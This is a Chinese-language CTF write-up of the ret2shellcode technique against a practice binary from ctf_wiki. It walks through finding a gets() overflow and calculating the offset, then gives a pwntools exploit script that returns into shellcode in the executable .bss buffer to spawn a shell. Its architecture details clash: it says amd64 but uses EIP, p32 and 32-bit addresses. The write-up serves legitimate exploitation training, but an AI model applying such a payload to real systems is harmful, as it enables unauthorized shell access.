【pwn-栈溢出】— ret2shellcode

目录

  • ret2shellcode
    • 0x1、程序信息
    • 0x2、检查保护
    • 0x3、寻找溢出点
    • 0x4、计算溢出偏移
    • 0x5、验证bss段可执行
    • 0x6、编写exp脚本

ret2shellcode

0x1、程序信息

描述 内容
程序名称 ret2shellcode
程序平台 linux
程序来源 ctf_wiki
CPU架构 amd64
libc版本 2.31
利用手法 ret2shellcode
系统版本 Ubuntu 20.04 LTS
下载地址 https://wwnd.lanzoue.com/ijspE0qedbte

0x2、检查保护

1.没有开启任何保护,堆、栈、BSS段均可执行代码
【pwn-栈溢出】— ret2shellcode_第1张图片

0x3、寻找溢出点

1.很明显的看到main函数中的gets函数存在溢出点,不过要注意下方,它将输入的字符串复制到了buf2变量中

【pwn-栈溢出】— ret2shellcode_第2张图片

2.我们双击buf2变量,跳转到了.bss段中,说明它是一个未初始化的全局变量

3.既然它会将用户输入的内容复制到这里来,且又没有开NX保护,所以我们直接在此处写入shellcode跳转过来

0x4、计算溢出偏移

1.gbd加载程序,输入cyclic 200生成200个随机字符,按r,继续运行程序,粘贴随机字符串
【pwn-栈溢出】— ret2shellcode_第3张图片

2.当程序断下来后,复制当前EIP
【pwn-栈溢出】— ret2shellcode_第4张图片

3.输入cyclic -l EIP,计算出溢出偏移

0x5、验证bss段可执行

1.在main函数下一个断点并执行

2.输入vmmap,查看起始为0x804a000模块权限信息(buf2在0x804a080),发现是带有可执行权限的

0x6、编写exp脚本

1.编写exp脚本

from pwn import *

# 启动进程
io = process('./ret2shellcode')

# 使用pwntools自带的命令生成shellcode
# 填充长度为产生溢出的偏移112
shellcode =  asm(shellcraft.sh()).ljust(112,b'\x00')

# 全局变量buf2的地址
payload = shellcode + p32(0x804A080)

# 发送shellcode
io.sendline(payload)

# 获取交互式shell
io.interactive()

2.运行脚本
【pwn-栈溢出】— ret2shellcode_第5张图片


战队官网:https://www.edisec.net/

战队CTF靶场:https://ctf.edisec.net/#/index

战队新社区:https://bbs.edisec.net

你可能感兴趣的:(PWN基础,网络安全)